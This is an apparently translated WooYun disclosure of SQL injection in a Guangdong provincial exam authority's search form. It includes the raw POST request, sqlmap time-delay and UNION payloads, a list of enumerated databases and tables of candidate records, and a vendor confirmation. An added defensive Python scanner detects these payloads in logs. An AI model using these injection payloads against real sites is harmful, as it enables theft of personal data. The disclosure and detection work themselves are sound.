WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online ----------------------- http://drop.zone.ci/
2015-10-08: Details sent to the vendor, awaiting vendor handling
2015-10-10: Vendor confirmed; details visible to the vendor only
2015-10-20: Details disclosed to core white hats and domain experts
2015-10-30: Details disclosed to regular white hats
2015-11-09: Details disclosed to intern white hats
2015-11-24: Details disclosed to the public

SQL injection in the professional technical qualification examination website of the Guangdong Provincial Personnel Examination Authority
http://**.**.**.**/news/news_khsh.asp
Search form:

POST /news/news_hgzs.asp HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://**.**.**.**/news/news_hgzs.asp
Cookie: counter=112017016; online=x; ASPSESSIONIDSQTSSDCA=JLMJELOBDADKACBAMLEJDCEP; _gscu_2021176043=44158462i7pslc18; _gscs_2021176043=44158462cf2hyu18|pv:1; _gscbrs_2021176043=1; CNZZDATA1255422720=2047127004-1444158464-http%253A%252F%252F**.**.**.**%252F%7C1444158464
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

title=xxx&content=xxx&Submit3=%C8%B7%C8%CF
Ran sqlmap against it directly:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: title=xxx';WAITFOR DELAY '0:0:5'--&content=xxx&Submit3=%C8%B7%C8%CF

    Type: UNION query
    Title: Generic UNION query (NULL) - 31 columns
    Payload: title=xxx' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(65)+CHAR(80)+CHAR(106)+CHAR(87)+CHAR(99)+CHAR(104)+CHAR(75)+CHAR(81)+CHAR(100)+CHAR(78)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &content=xxx&Submit3=%C8%B7%C8%CF
---
[03:45:07] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[03:45:07] [INFO] fetching database names
[03:45:07] [WARNING] reflective value(s) found and filtering out
available databases [20]:
[*] Chinaexam_DB
[*] chinaexam_web
[*] chinaexamda
[*] chinaexamwj
[*] complain
[*] gdkszx
[*] gdkszx0801
[*] gdkszx_orign
[*] HIS_BM
[*] km
[*] loganalyse
[*] master
[*] model
[*] msdb
[*] record_login
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WSDB
[*] wszx
Database: gdkszx
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.kuaiji2005          | 129914  |
| dbo.construct_b2013     | 91836   |
| dbo.construct_a2011_qry | 63461   |
| dbo.construct_two2008   | 28654   |
| dbo.wszx20090217_orign  | 8098    |
| dbo.jl2007              | 3152    |
| dbo.jz12010_mon         | 2075    |
| dbo.ghzh2011_bad        | 1899    |
| dbo.zxzh2009            | 1690    |
| dbo.ghzh2005            | 1105    |
| dbo.environment2007     | 959     |
| dbo.pgzh2013            | 824     |
| dbo.pgzh2010            | 743     |
| dbo.guanli2008          | 529     |
| dbo.ngcgh2012           | 224     |
| dbo.jz2013              | 196     |
| dbo.ngcym2012           | 43      |
| dbo.ngcdz2012           | 24      |
| dbo.subaccount          | 1       |
+-------------------------+---------+

Database: gdkszx0801
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| dbo.kuaiji2005            | 129914  |
| dbo.construct_a2011_qry   | 63461   |
| dbo.environment2011aaaaaa | 40436   |
| dbo.construct_two2008     | 28654   |
| dbo.construct_a2011_qry1  | 12422   |
| dbo.tax20050823           | 9250    |
| dbo.wszx20090217_orign    | 8098    |
| dbo.jl2007                | 3152    |
| dbo.jz12010_mon           | 2075    |
| dbo.ghzh2011_bad          | 1899    |
| dbo.zxzh2009              | 1690    |
| dbo.qfzh2006              | 1394    |
| dbo.ghzh2005              | 1105    |
| dbo.environment2007       | 959     |
| dbo.pgzh2010              | 743     |
| dbo.guanli2008            | 529     |
| dbo.sbjl2010              | 267     |
| dbo.jz_2010w              | 158     |
| dbo.subaccount            | 1       |
+---------------------------+---------+
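The sqlmap output above shows two payload families against the `title` parameter: a stacked query ending in `WAITFOR DELAY` (time-based confirmation) and a NULL-padded `UNION ALL SELECT` carrying a `CHAR()`-concatenated marker string. The following Python scanner is an added example, not part of the report or the affected site's code: it percent-decodes form bodies the way the server would (GBK, as the `Submit3=%C8%B7%C8%CF` value shows) and flags those signatures, so a defender reviewing web logs can pick out the probes. The log lines and timestamps are constructed; only the path `/news/news_hgzs.asp` and the payload shapes come from the page. The remediation on the application side is a parameterized query for the `title` and `content` fields rather than string concatenation.

```python
import re
from urllib.parse import parse_qs

# Signature regexes for the MSSQL payload families sqlmap reported on this page
# (stacked-query time delay, NULL-padded UNION, CHAR()-concatenated marker string)
# plus the trailing "--" comment that truncates the rest of the original query.
SIGNATURES = {
    "stacked_time_delay": re.compile(r";\s*WAITFOR\s+DELAY\s+'[\d:.]+'", re.IGNORECASE),
    "union_null_padding": re.compile(r"UNION\s+(?:ALL\s+)?SELECT\s+(?:NULL\s*,\s*){3,}", re.IGNORECASE),
    "char_concat": re.compile(r"(?:CHAR\(\d{1,3}\)\s*\+\s*){3,}CHAR\(\d{1,3}\)", re.IGNORECASE),
    "comment_terminator": re.compile(r"--\s*$"),
}


def decode_body(body: str, encoding: str = "gbk") -> dict[str, str]:
    """Percent-decode an application/x-www-form-urlencoded body into {name: value}.

    Decode before matching: a raw '+' in a form body is a space, so the literal
    '+' of a CHAR()+CHAR() chain travels on the wire as %2B. The form on this
    page is GBK-encoded (Submit3=%C8%B7%C8%CF), hence the default codec.
    """
    parsed = parse_qs(body, keep_blank_values=True, encoding=encoding, errors="replace")
    return {name: values[0] for name, values in parsed.items()}


def scan_request(body: str, encoding: str = "gbk") -> dict[str, list[str]]:
    """Return {parameter: [matched signature names]} for suspicious parameters."""
    findings = {}
    for name, value in decode_body(body, encoding).items():
        hits = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if hits:
            findings[name] = hits
    return findings


def scan_log(lines: list[str]) -> list[tuple[int, dict[str, list[str]]]]:
    """Scan log lines of the constructed form '<timestamp> <method> <path> <body>'.

    Only POST lines are examined; returns (line number, findings) per hit.
    """
    results = []
    for lineno, line in enumerate(lines, start=1):
        parts = line.split(" ", 3)
        if len(parts) < 4 or parts[1] != "POST":
            continue
        findings = scan_request(parts[3])
        if findings:
            results.append((lineno, findings))
    return results


# Constructed sample log: a benign submit, the two probe shapes from the report
# (percent-encoded as a client would send them), and an unrelated GET.
SAMPLE_LOG = [
    "2015-10-08T03:44:59 POST /news/news_hgzs.asp title=xxx&content=xxx&Submit3=%C8%B7%C8%CF",
    "2015-10-08T03:45:02 POST /news/news_hgzs.asp title=xxx'%3BWAITFOR+DELAY+'0%3A0%3A5'--&content=xxx&Submit3=%C8%B7%C8%CF",
    "2015-10-08T03:45:05 GET /news/news_hgzs.asp -",
    "2015-10-08T03:45:07 POST /news/news_hgzs.asp title=xxx'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,"
    "CHAR(113)%2BCHAR(107)%2BCHAR(113)%2BCHAR(118)%2BCHAR(113),NULL,NULL--+&content=xxx&Submit3=%C8%B7%C8%CF",
]

if __name__ == "__main__":
    for lineno, findings in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {findings}")
```

The signatures are deliberately narrow (they describe what sqlmap actually sent here, not every possible injection), so a miss is not proof of a clean log; the value of the scan is in surfacing the automated probing that precedes a dump like the one above.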
Severity: High
Vulnerability rank: 10
Confirmed: 2015-10-10 15:00
Thank you very much for your report. The issue in the report has been confirmed and reproduced. Affected data: high; attack cost: low; resulting impact: high; overall rating: high, rank: 10. We are contacting the relevant website administration unit to handle it.

None yet.